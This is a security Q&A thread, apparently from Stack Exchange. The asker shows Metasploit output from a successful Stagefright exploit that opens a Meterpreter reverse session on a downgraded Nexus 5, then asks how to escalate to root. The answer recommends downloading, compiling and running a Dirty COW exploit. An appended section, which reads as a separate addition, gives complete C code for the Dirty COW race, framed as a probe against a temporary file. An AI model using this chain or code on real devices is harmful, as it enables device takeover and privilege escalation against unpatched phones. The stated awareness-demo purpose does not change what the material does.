
I am preparing a part of a security awareness day and one part of the "show" should be about mobile security. I thought about showing the stagefright exploit.

So I started with getting a mobile phone that is supported by the latest Stagefright module in the Metasploit framework (Nexus 5), downgraded it to a version with the Stagefright vulnerability (Android 5.0.1 LRX22C) and started to exploit.

All works fine:

[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0x0, code: 0x0 from Browser)
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Target selected: Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending HTML to 192.168.1.108:56616...
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0x0 from Browser)
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102053 bytes) to 192.168.1.108:56616... (heap: 0xb3a2e980, code: 0xb64f1cb0 from Browser)
[*] 192.168.1.108    stagefright_mp4_tx3g_64bit - Sending RCE gzip'd MPEG4 (102048 bytes) to 192.168.1.108:58971... (heap: 0xb3a2e980, code: 0xb64f1cb0 from SF)
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (397164 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.108:44680) at 2017-02-19 05:19:51 -0500

Within this session, I am pretty helpless and have no rights. My UID is 1013, which I assume is the mediaserver's UID. I do not have access to any interesting directory or file (no access, no effect for my show). Awe-struck, I noticed that this phone uses SELinux. I decided to ask Google how to get more privileges and found this: CVE-2015-3864 Metasploit Module from Mr. Drake aka jduck.

He used some specially crafted mettle to gain root access within this SELinux environment. But I have to admit that this is something I would need some advice/help with. How do I build such merged payloads with mettle, pingpong and iovyroot?
In short: How do I get more privileges or maybe even root on this phone to show something that touches the audience?

More precise Question:
How do I customize the mettle payload to include the PingPong-root and Iovy-root exploits?
(Any other customization of payloads for gaining root access is welcome, too ;) )

Agent H.
  • Your guess is mediaserver's UID... can you run shell in meterpreter and then a whoami command to see the name of the user? – OscarAkaElvis Feb 19 '17 at 21:41
  • There is no who, whoami or w command. But getuid. And yes, I am the mediaserver and inside its process context. – Agent H. Feb 20 '17 at 09:40

1 Answer


Use the Dirty COW kernel vulnerability. I guess that with the downgrade you did, the kernel is vulnerable to it.

You can use it on Android kernels too: Dirty Cow Android PoC.

A video example about it: https://www.youtube.com/watch?v=4xdMteqm994

Once inside the device, you can download the exploit via wget (or however you like), compile it and run it to gain root. Check your kernel to see if it is vulnerable; I guess it is.

OscarAkaElvis
  • Comments are not for extended discussion; this conversation has been [moved to chat](http://chat.stackexchange.com/rooms/53897/discussion-on-answer-by-oscarakaelvis-selinux-privilege-escalation-metasploit-ne). – Rory Alsop Feb 19 '17 at 15:01
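The answer says to check whether the kernel is vulnerable before going further. The following probe is an added example and is not code from the original post or from the linked Android PoC: it reproduces the race from the public dirtyc0w.c (Dirty COW is CVE-2016-5195) against a throw-away file the process owns, so it tells you whether this kernel has the bug without overwriting anything privileged. Converting a positive result into root (the Android PoCs overwrite a setuid binary such as run-as) is deliberately left out. The directory argument is an assumption: `/data/local/tmp` is the default here, but from a mediaserver (uid 1013) shell under SELinux you may have to pick another directory you can create files in, and the probe may also be denied opening `/proc/self/mem`, in which case it reports that it could not run rather than guessing.

```c
/* Dirty COW (CVE-2016-5195) probe. Added example, not code from the original
 * post: it reproduces the public dirtyc0w.c race against a temporary file the
 * caller owns, so it only reports whether the running kernel is vulnerable. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/utsname.h>
#include <unistd.h>

#define PROBE_ITERS 200000                   /* raise on a slow device */
#define ORIGINAL "dirtycow-probe-original"   /* constructed file content */
#define PAYLOAD  "dirtycow-probe-OVERWRIT"   /* same length as ORIGINAL */
_Static_assert(sizeof ORIGINAL == sizeof PAYLOAD, "payload length mismatch");

static void *map;                 /* PROT_READ, MAP_PRIVATE view of the file */
static size_t map_len;
static volatile int abort_probe;  /* set when /proc/self/mem is unusable */

/* Thread A: keep discarding the private copy-on-write page so the kernel
 * must fault it in again while thread B is writing. */
static void *madvise_thread(void *arg)
{
    (void)arg;
    for (int i = 0; i < PROBE_ITERS && !abort_probe; i++)
        madvise(map, map_len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write through /proc/self/mem at the mapping address. A fixed
 * kernel lands every write in the private copy; a vulnerable one can lose
 * the race and write into the page cache, i.e. into the read-only file. */
static void *procmem_thread(void *arg)
{
    (void)arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { abort_probe = 1; return NULL; }
    for (int i = 0; i < PROBE_ITERS && !abort_probe; i++) {
        lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
        write(fd, PAYLOAD, strlen(PAYLOAD));
    }
    close(fd);
    return NULL;
}

/* Run the race against a temporary file created in `dir` (assumed writable).
 * Returns 1 if the file changed (kernel vulnerable), 0 if it did not,
 * -1 if the probe could not run (no writable dir, no /proc/self/mem). */
int dirtycow_probe(const char *dir)
{
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/dirtycow-probe-XXXXXX", dir);
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    if (write(fd, ORIGINAL, strlen(ORIGINAL)) != (ssize_t)strlen(ORIGINAL)) {
        close(fd); unlink(path); return -1;
    }
    close(fd);

    int result = -1;
    fd = open(path, O_RDONLY);            /* read-only, like a root-owned target */
    if (fd >= 0) {
        struct stat st;
        if (fstat(fd, &st) == 0) {
            map_len = (size_t)st.st_size;
            map = mmap(NULL, map_len, PROT_READ, MAP_PRIVATE, fd, 0);
            if (map != MAP_FAILED) {
                abort_probe = 0;
                pthread_t a, b;
                pthread_create(&a, NULL, madvise_thread, NULL);
                pthread_create(&b, NULL, procmem_thread, NULL);
                pthread_join(a, NULL);
                pthread_join(b, NULL);
                munmap(map, map_len);
                if (!abort_probe) {
                    /* Re-read from the file itself, not through the mapping. */
                    char buf[sizeof ORIGINAL] = {0};
                    int rfd = open(path, O_RDONLY);
                    if (rfd >= 0 && read(rfd, buf, sizeof buf - 1) > 0)
                        result = strcmp(buf, ORIGINAL) == 0 ? 0 : 1;
                    if (rfd >= 0) close(rfd);
                }
            }
        }
        close(fd);
    }
    unlink(path);
    return result;
}

int main(int argc, char **argv)
{
    struct utsname u;
    if (uname(&u) == 0)
        printf("kernel %s %s\n", u.release, u.version);
    int r = dirtycow_probe(argc > 1 ? argv[1] : "/data/local/tmp");
    printf("dirty cow: %s\n", r == 1 ? "VULNERABLE" :
                              r == 0 ? "not vulnerable" : "probe could not run");
    return r == 1 ? 0 : 1;
}
```

Build it against the NDK for the target ABI (the Nexus 5 above is 32-bit ARM), push it into the directory you pass as the first argument, and run it from the meterpreter shell: a "VULNERABLE" verdict means the madvise/procmem race landed a write in the page cache of a file that was mapped read-only and private, which is exactly the primitive the Android PoC uses against a root-owned binary. If it prints "probe could not run", check whether mkstemp or /proc/self/mem is being blocked by file permissions or SELinux before concluding anything about the kernel.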